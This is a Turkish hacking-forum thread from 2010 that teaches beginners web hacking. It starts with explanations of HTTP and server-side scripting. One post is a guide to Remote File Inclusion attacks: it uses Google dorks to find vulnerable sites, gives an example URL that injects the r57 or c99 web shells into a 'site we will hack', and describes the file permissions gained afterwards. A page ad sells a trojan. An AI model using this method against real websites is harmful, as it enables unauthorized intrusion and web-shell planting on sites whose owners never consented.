|
|
Web hacking başlangıçHTTP’e Giriş HTTP(Hypertext Transfer Protocol) OSI modelinde uygulama katmanında yer alan iletişim protokolüdür. Günümüzde zamanımızın çoğunu geçirdiğimiz sanal dünyada en sık kullanılan protokoldür. (%96 civarında) HTTP Nasıl Çalışır? Http’nin istemci-sunucu
Konu m0liver tarafından açılmış, 1871 kişi tarafından görüntülenip, 15 yanıt almış.
|
Özel Yazılım Trojan+, güncellemeli ve garantili. Sadece 690TL! Kredi kartınıza 12 taksit kolaylığı!
|
|||||||
Web hacking başlangıç konusundaki toplam yorum: 15, okunma sayısı: 1871. |
|
|
||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
06-06-2010, 18:05
|
#1 |
|
Forum Ustası
 
Kayıt Tarihi: Oct 2006
Üye numarası: #96379
Mesaj sayısı: 2,996
Karma etkisi: 6264
  Karma: 625645
|
Web hacking başlangıç
HTTP’e Giriş
HTTP(Hypertext Transfer Protocol) OSI modelinde uygulama katmanında yer alan iletişim protokolüdür. Günümüzde zamanımızın çoğunu geçirdiğimiz sanal dünyada en sık kullanılan protokoldür. (%96 civarında) HTTP Nasıl Çalışır? Http’nin istemci-sunucu mantığıyla çalışan basit bir yapısı vardır. Önce TCP bağlantısı açılır, kullanıcı istek(HTTP isteği) gönderir sunucu da buna uygun cevap döner ve TCP bağlantısı kapatılır. İstemci(kullanıcı) tarafından gönderilen istekler birbirinden bağımsızdır ve normalde her HTTP isteği için bir TCP bağlantısı gerekir. HTTP’nin basitliğinin yanında günümüz web sayfaları sadece http sunuculardan oluşmaz, çoğu sistemin bilgilerini tutmak için kullanılan veritabanları da artık web sayfalarının vazgeçilmez bileşeni olmuştur.  Yukarıdaki resim klasik bir web sayfasını temsil eder. Buna göre web sayfalarımız ister web sunucuyla aynı makinede olsun ister başka bir makinede olsun bir veritabanına bağımlıdır. Web’in çalışma mantığı istek ve cevaplardan oluşur, istekler ve bunlara dönülecek cevaplar farklıdır. Bu konuda detay için HTTP RFC’si 2616 incelenebilir.   Yapılan isteğin çeşidine göre sunucudan dönecek cevap da farklı olacaktır. Mesela istenen dosya sistem üzerinde yoksa 404 cevabı, gelen istek izni olmayan bir dosyayı istiyorsa 403 forbidden cevabı dönecektir. HTTP ve TCP ilişkisi HTTP TCP kullanan bir protokoldür. Her HTTP bağlantısı öncesinde mutlaka TCP bağlantısı kurulmalıdır. Basit bir hesapla her HTTP bağlantısı için ortalama 10 adet TCP paketi gidip gelmektedir(3 adet TCP bağlantı başlangıcı, 4 adet TCP bağlantı koparılması, 2-3 adet de HTTP isteği ve buna dönecek cevap paketlerinin taşındığı TCP paketleri). Bu da klasik HTTP kullanımında performans sorununu beraberinde getirir. Günümüzde normal bir haber portalının yüklenmesi için ortalama 40-50 HTTP GET isteği gönderilmektedir. Bunu da hesaplarsak portal sayfasının açılması için ortalama 50X10=500 TCP paketinin gidip gelmesi gerekir ki bu değer haber kullanıcıyı okumaktan vazgeçirecek kadar fazladır.  HTTP’de bu performans sorununu aşabilmek için çeşitli yöntemler geliştirilmiştir. Bunların başında HTTP KeepAlive(persistent connection) özelliği gelmektedir. HTTP Keep Alive özelliği her HTTP isteği için ayrı bir TCP bağlantısı açmak yerine bir adet TCP bağlantısı içerisinden belirli sayıda (5, 10, ..) HTTP isteğinin aktarılabilmesini sağlar.  Kaynak: Wardom http://www.wardom.com.tr/showthread.php?t=387065 Kaynak: webgüvenliği |
|
|
|
06-06-2010, 18:11
|
#2 |
|
Forum Kalfası
Kayıt Tarihi: Jul 2009
Üye numarası: #345749
Mesaj sayısı: 1,343
Karma etkisi: 8687
Karma: 868342
|
Yeni başlayanlar için güzel bilgiler,teşekkürler..
|
|
|
|
|
06-06-2010, 20:42
|
#3 |
|
Forum Ustası
Kayıt Tarihi: Oct 2006
Üye numarası: #96379
Mesaj sayısı: 2,996
Karma etkisi: 6264
Karma: 625645
|
Web Hacking Başlangıç
Bilmeniz Gerekenler:
Vulnerability : Güvelik boşluğu olarak nitelendirebiliriz. RFI [ Remote File Inclusion ] : Açığı olan sitede dışarıdan kod çalıştırabiliyorsunuz. LFI [ Local File Inclusion ] : Sunucu içerisinde kod çalıştırabiliyorsunuz. XSS [ Cross Site Scripting ] : Eğer açık mevcutsa, oturum bilgilerini çalabilirsiniz. |
|
|
|
|
06-06-2010, 20:59
|
#4 |
|
Forum Ustası
Kayıt Tarihi: Oct 2006
Üye numarası: #96379
Mesaj sayısı: 2,996
Karma etkisi: 6264
Karma: 625645
|
Server-side Client-side Nedir
Client-side: Kullanıcı tabanlı demektir.
Server-side: Sunucu Tabanlı demektir. Client-Side Scripting dediğimizde aklımıza Html, css ve javascript 'i getirebiliriz. Server-side scripting için ise; asp php perl jsp cold fusion Kaynak: Wardom http://www.wardom.com.tr/showthread.php?t=387065 olabilir. Bir php scripti'ini baz alalım server-side'ın nasıl çalıştığını anlamak adına: ilk olarak bir istek(request) yapıyoruz sitenin url'sini yazarak Php işliyor ve cevap gönderiyor Biz de gelen veriyi Html olarak görüyoruz. Bu yüzden kaynak koduna bakınca Php gözükmez. Aşağıda gördüğünüz grafikte asp.net için anlatılmış. Temel mantıkta hepsi aynıdır.  |
|
|
|
|
06-06-2010, 23:54
|
#5 |
|
Banned
Kayıt Tarihi: Sep 2006
Üye numarası: #86806 Yer: siz'im :p
Mesaj sayısı: 2,281
Karma etkisi: 0
Karma: 2287147
|
evren abi seri olarak mı devam edicek yoksa bizde eklentiler yapabilirmiyiz?
|
|
|
|
|
07-06-2010, 00:12
|
#6 |
|
Forum Ustası
Kayıt Tarihi: Oct 2006
Üye numarası: #96379
Mesaj sayısı: 2,996
Karma etkisi: 6264
Karma: 625645
|
Paylaşabilirsiniz konu ama başlangıç düzeyi olmalıdır.
webhacking ve exploting'te ki başlangıç ve orta düzey konularına bakın ne nerede ona göre koyarsanız sevinirim. |
|
|
|
|
07-06-2010, 01:11
|
#7 | |
|
Banned
Kayıt Tarihi: Sep 2006
Üye numarası: #86806 Yer: siz'im :p
Mesaj sayısı: 2,281
Karma etkisi: 0
Karma: 2287147
|
Alıntı:
 |
|
|
|
|
|
07-06-2010, 01:13
|
#8 | |
|
Forum Ustası
Kayıt Tarihi: Oct 2006
Üye numarası: #96379
Mesaj sayısı: 2,996
Karma etkisi: 6264
Karma: 625645
|
Alıntı:
Teşekkürler |
|
|
|
|
|
07-06-2010, 01:25
|
#9 | |
|
Banned
Kayıt Tarihi: Sep 2006
Üye numarası: #86806 Yer: siz'im :p
Mesaj sayısı: 2,281
Karma etkisi: 0
Karma: 2287147
|
Alıntı:
buraya taşındı, biraz daha düzenlemeler yapıldı ve ayrıca oraya koyma sebebim exploitlerle bulunuyor sonuçta o açıklar o yuzdendi.. __________________________________________________ _______________________ Rfi (Remote File Include ) türkçe karşılığı uzak dosya ekleme/çıkarma vb. anlamı bulunur. File Include uygulanmasını anlatmak için once bir takım terımleri tanımanız gerekmektedir ; R57shell: Su anda dunyadaki en kaliteli shelldir.Shell nedir shell kısaca linux kabugudur.İllegaliate merak saranlar içinse internetin ta kendısıdır. C99shell: R57Shell in birazcık daha eskı ve daha kullanıssız versiyonudur.(nette kullanışsız deniliyor ama yerine gore c99u daha cok seviyorum) Shell Yüklendiği Sitede Size Çeşitli Yetkiler Veren Bir Materyaldir. Bu Yetkiler; Okuma, Yazma ve Silme Yetkileridir. Shell Attığınız Sitede Bazen Bir Site Sahibinin Yetkilerini Kullanabilirken, Bazende Host Sahibinin Yetkilerini Kullana Biliyorsunuz. Bu Olaya Permission Yetkisi Diyebiliriz. ön bilgilerin dahilinde ana terimlere kullanıma geçelim öncelikle edit: olarak forumumuzun sabit başlığı olan http://www.wardom.org/exploit-linkleri-t387066.html başlık ta bulunan sitelerden exploit bularak kullanılır, genel olarak en geniş arşiv milw0rm'da dır File include uygulaması diyelim haydi bismillah exploitlerde bulunan örneğin [+] Dork : "bozo" google arama kodudur ki bunu barındıran sitelerde iş yapacağımızı gösterir. ~] FAQEngine 4.24.00 - Remote File Inclusion vulnerability [ RFI ] hangi açıktan yararlanacağımızı gösterir vb. örneğim dork la google vb. siteden acıgımızı bulduk ve sitemiz bunun gibi olsun; http://www. lamer site .com/admin/config_settings.tpl.php?include_path=[r57.txt & c99.txt] bunun anlamı www. lamer site .com adresi hackleyeceğimiz adres olur, config_settings.tpl.php?include_path=[r57.txt & c99.txt] bu bolumse değişkendir siteye göre açığa göre değişiklik gösterir. shell adresleri http://www.google.com.tr/#hl=tr&q=r5...a1bab56756873a http://www.google.com.tr/#hl=tr&q=c9...a1bab56756873a ya üstteki google aramalarından yada kendiniz bir host'a shell'i atarak kullanabilirsiniz. eğer server shell'i yerse shell soktuğunuz hosttaki dosyalar shell'in olduğu dizinden itibaren ftp görünümü listelenir. yeşil şekilde drwxrwxrwx yada drwx---rwx şeklinde olan bölümler sizin erişim ve dosya değişim izninizin olduğu yerlerdir. bazı terimler anlatımın ulvi kısımları alıntıdır. saygılarımla B0Z0 & Wardom.org Düzenleyen B0Z0 : 07-06-2010 at 01:27. |
|
|
|
|
|
07-06-2010, 08:15
|
#10 |
|
Çırak
Kayıt Tarihi: Mar 2010
Üye numarası: #435513
Mesaj sayısı: 10
Karma etkisi: 0
Karma: 10
|
Verdiğiniz bilgiler için teşekkür ederim.
Bizim gibi yeniler için (: Güzel paylaşımlar emeğinize sağlık + REP |
|
|
|
|
07-06-2010, 11:48
|
#11 | |
|
Banned
Kayıt Tarihi: Sep 2006
Üye numarası: #86806 Yer: siz'im :p
Mesaj sayısı: 2,281
Karma etkisi: 0
Karma: 2287147
|
Alıntı:
|
|
|
|
|
|
08-06-2010, 11:06
|
#12 |
|
Daimi Üye
Kayıt Tarihi: Mar 2010
Üye numarası: #432020 Yer: Uluslararası topraklar
Mesaj sayısı: 325
Karma etkisi: 2117
Karma: 211400
|
Çok hevesliyim ama bi türlü kafama girmiyor. Ya da bilgi kirliliği çok fazla. Paylaşım için teşşekkürler...
|
|
|
|
|
13-07-2010, 00:00
|
#13 |
|
Çırak
Kayıt Tarihi: Jul 2010
Üye numarası: #465053
Mesaj sayısı: 7
Karma etkisi: 0
Karma: 10
|
Teşekkürler
|
|
|
|
|
06-08-2010, 13:04
|
#14 |
|
Banned
Kayıt Tarihi: Aug 2010
Üye numarası: #471036
Mesaj sayısı: 95
Karma etkisi: 0
Karma: 6282
|
teşekkürler verdiğiniz bilgiler için
|
|
|
|
|
15-08-2010, 11:27
|
#15 |
|
Çırak
Kayıt Tarihi: Aug 2010
Üye numarası: #473957
Mesaj sayısı: 3
Karma etkisi: 0
Karma: 10
|
biligiler çok guzel bizim gibi yenilerintam harcı olmuş eline sağlık
|
|
|
|
 |
| Şu Anda Konuyu Görüntüleyenler: 1 (0 üye ve 1 misafir) | |
| Konu Araçları | Bu Konuda Ara |
|
|
